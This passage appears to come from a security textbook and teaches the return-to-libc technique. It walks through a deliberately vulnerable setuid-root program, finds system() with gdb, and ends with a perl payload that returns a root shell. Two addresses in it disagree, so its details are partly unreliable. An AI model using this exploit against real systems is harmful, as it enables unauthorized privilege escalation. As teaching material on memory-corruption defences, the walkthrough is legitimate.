Most applications never need to execute anything on the stack, so an obvious defense against buffer overflow exploits is to make the stack nonexecutable. When this is done, shellcode inserted anywhere on the stack is basically useless. This type of defense will stop the majority of exploits out there, and it is becoming more popular. The latest version of OpenBSD has a nonexecutable stack by default, and a nonexecutable stack is available in Linux through PaX, a kernel patch.
1. ret2libc
Of course, there exists a technique used to bypass this protective countermeasure. This technique is known as returning into libc. libc is a standard C library that contains various basic functions, such as printf() and exit(). These functions are shared, so any program that uses the printf() function directs execution into the appropriate location in libc. An exploit can do the exact same thing and direct a program's execution into a certain function in libc. The functionality of such an exploit is limited by the functions in libc, which is a significant restriction when compared to arbitrary shellcode. However, nothing is ever executed on the stack.
2. Returning into system()
One of the simplest libc functions to return into is system(). As you recall, this function takes a single argument and executes that argument with /bin/sh. This function only needs a single argument, which makes it a useful target. For this example, a simple vulnerable program will be used.
2.1. vuln.c
int main(int argc, char *argv[])
{
char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}
Of course, this program must be compiled and setuid root before it's truly vulnerable.
reader@hacking:~/booksrc $ gcc -o vuln vuln.c
reader@hacking:~/booksrc $ sudo chown root ./vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./vuln
reader@hacking:~/booksrc $ ls -l ./vuln
-rwsr-xr-x 1 root reader 6600 2007-09-30 22:43 ./vuln
reader@hacking:~/booksrc $
The general idea is to force the vulnerable program to spawn a shell, without executing anything on the stack, by returning into the libc function system(). If this function is supplied with the argument of /bin/sh, this should spawn a shell.
First, the location of the system() function in libc must be determined. This will be different for every system, but once the location is known, it will remain the same until libc is recompiled. One of the easiest ways to find the location of a libc function is to create a simple dummy program and debug it, like this:
reader@hacking:~/booksrc $ cat > dummy.c
int main()
{ system(); }
reader@hacking:~/booksrc $ gcc -o dummy dummy.c
reader@hacking:~/booksrc $ gdb -q ./dummy
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/matrix/booksrc/dummy
Breakpoint 1, 0x0804837a in main ()
(gdb) print system
$1 = {} 0xb7ed0d80
(gdb) quit
Here, a dummy program is created that uses the system() function. After it's compiled, the binary is opened in a debugger and a breakpoint is set at the beginning. The program is executed, and then the location of the system() function is displayed. In this case, the system() function is located at 0xb7ed0d80.
Armed with that knowledge, we can direct program execution into the system() function of libc. However, the goal here is to cause the vulnerable program to execute system("/bin/sh") to provide a shell, so an argument must be supplied. When returning into libc, the return address and function arguments are read off the stack in what should be a familiar format: the return address followed by the arguments. On the stack, the return-into-libc call should look something like this:
Directly after the address of the desired libc function is the address to which execution should return after the libc call. After that, all of the function arguments come in sequence.
In this case, it doesn't really matter where the execution returns to after the libc call, since it will be opening an interactive shell. Therefore, these four bytes can just be a placeholder value of FAKE. There is only one argument, which should be a pointer to the string /bin/sh. This string can be stored anywhere in memory; an environment variable is an excellent candidate. In the output below, the string is prefixed with several spaces. This will act similarly to a NOP sled, providing us with some wiggle room, since system(" /bin/sh") is the same as system(" /bin/sh").
reader@hacking:~/booksrc $ export BINSH=" /bin/sh"
reader@hacking:~/booksrc $ ./getenvaddr BINSH ./vuln
BINSH will be at 0xbffffe5b
reader@hacking:~/booksrc $
So the system() address is 0xb7ed0d80, and the address for the /bin/sh string will be 0xbffffe5b when the program is executed. That means the return address on the stack should be overwritten with a series of addresses, beginning with 0xb7ecfd80, followed by FAKE (since it doesn't matter where execution goes after the system() call), and concluding with 0xbffffe5b.
A quick binary search shows that the return address is probably overwritten by the eighth word of the program input, so seven words of dummy data are used for spacing in the exploit.
Code View:
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x10')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7')
Illegal instruction
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7 . "\x80\x0d\xed\xb7FAKE\x5b
\xfe\
xff\xbf"')
sh-3.2# whoami
root
sh-3.2#
The exploit can be expanded upon by making chained libc calls, if needed. The return address of FAKE used in the example can be changed to direct program execution. Additional libc calls can be made, or execution can be directed into some other useful section in the program's existing instructions.